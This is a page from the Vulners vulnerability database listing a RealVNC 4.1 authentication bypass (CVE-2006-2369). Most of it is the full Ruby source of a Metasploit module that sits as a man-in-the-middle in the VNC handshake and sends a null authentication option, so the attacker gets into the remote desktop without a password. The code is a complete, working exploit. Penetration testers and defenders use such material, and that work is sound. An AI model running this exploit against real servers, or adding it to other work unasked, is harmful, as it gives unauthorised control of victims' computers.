Vulners
Lucene search
RealVNC 4.1 Authentication Bypass
| Reporter | Title | Published | Views | Family All 36 |
|---|---|---|---|---|
 | RealVNC Authentication Bypass | 26 Aug 201100:00 | – | zdt |
 | Exploit for Improper Authentication in Vnc Realvnc | 8 Mar 202608:00 | – | githubexploit |
 | CVE-2006-2369 | 26 Aug 201100:00 | – | circl |
 | RealVNC Password Authentication Bypass (CVE-2006-2369) | 25 May 200600:00 | – | checkpoint_advisories |
 | CVE-2006-2369 | 15 May 200616:00 | – | cve |
 | CVE-2006-2369 | 15 May 200616:00 | – | cvelist |
 | CVE-2006-2369 | 15 May 200616:00 | – | debiancve |
 | RealVNC - Authentication Bypass (Metasploit) | 26 Aug 201100:00 | – | exploitdb |
| RealVNC 4.1.0/4.1.1 - Authentication Bypass | 13 May 201200:00 | – | exploitdb |
 | RealVNC 4.1.04.1.1 - Authentication Bypass | 13 May 201200:00 | – | exploitpack |
10
##
# $Id: realvnc_41_bypass.rb 13641 2011-08-26 04:40:21Z bannedit $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'RealVNC Authentication Bypass',
'Description' => %q{
This module exploits an Authentication Bypass Vulnerability
in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy
listener on LPORT and proxies to the target server
The AUTOVNC option requires that vncviewer be installed on
the attacking machine. This option should be disabled for Pro
},
'Author' =>
[
'hdm', #original msf2 module
'TheLightCosine <thelightcosine[at]gmail.com>'
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 13641 $',
'References' =>
[
['BID', '17978'],
['OSVDB', '25479'],
['URL', 'http://secunia.com/advisories/20107/'],
['CVE', 'CVE-2006-2369'],
],
'DisclosureDate' => 'May 15 2006'))
register_options(
[
OptAddress.new('RHOST', [true, 'The Target Host']),
OptPort.new('RPORT', [true, "The port the target VNC Server is listening on", 5900 ]),
OptPort.new('LPORT', [true, "The port the local VNC Proxy should listen on", 5900 ]),
OptBool.new('AUTOVNC', [true, "Automatically Launch vncviewer from this host", true])
], self.class)
end
def run
#starts up the Listener Server
print_status("starting listener")
listener = Rex::Socket::TcpServer.create(
'LocalHost' => '0.0.0.0',
'LocalPort' => datastore['LPORT'],
'Context' => { 'Msf' => framework, 'MsfExploit' => self }
)
#If the autovnc option is set to true this will spawn a vncviewer on the lcoal machine
#targetting the proxy listener.
if (datastore['AUTOVNC'])
unless (check_vncviewer())
print_error("vncviewer does not appear to be installed, exiting!!!")
return nil
end
print_status("Spawning viewer thread")
view = framework.threads.spawn("VncViewerWrapper", false) {
system("vncviewer 127.0.0.1::#{datastore['LPORT']}")
}
end
#Establishes the connection between the viewier and the remote server
client = listener.accept
add_socket(client)
s = Rex::Socket::Tcp.create(
'PeerHost' => datastore['RHOST'],
'PeerPort' => datastore['RPORT'],
'Timeout' => 1
)
add_socket(s)
serverhello = s.gets
unless serverhello.include? "RFB 003.008"
print_error("The VNCServer is not vulnerable")
return
end
#MitM attack on the VNC Authentication Process
client.puts(serverhello)
clienthello = client.gets
s.puts(clienthello)
authmethods = s.recv(2)
print_status("Auth Methods Recieved. Sending Null Authentication Option to Client")
client.write("\x01\x01")
client.recv(1)
s.write("\x01")
s.recv(4)
client.write("\x00\x00\x00\x00")
#handles remaining proxy operations between the two sockets
closed = false
while(closed == false)
sockets =[]
sockets << client
sockets << s
selected = select(sockets,nil,nil,0)
#print_status ("Selected: #{selected.inspect}")
unless selected.nil?
if selected[0].include?(client)
#print_status("Transfering from client to server")
begin
data = client.sysread(8192)
if data.nil?
print_error("Client Closed Connection")
closed = true
else
s.write(data)
end
rescue
print_error("Client Closed Connection")
closed = true
end
end
if selected[0].include?(s)
#print_status("Transfering from server to client")
begin
data = s.sysread(8192)
if data.nil?
print_error("Server Closed Connection")
closed = true
else
client.write(data)
end
rescue
closed = true
end
end
end
end
#Garbage Collection
s.close
client.close
print_status("Listener Closed")
if (datastore['AUTOVNC'])
view.kill
print_status("Viewer Closed")
end
end
def check_vncviewer
vnc =
Rex::FileUtils::find_full_path('vncviewer') ||
Rex::FileUtils::find_full_path('vncviewer.exe')
if (vnc)
return true
else
return false
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Aug 2011 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.92336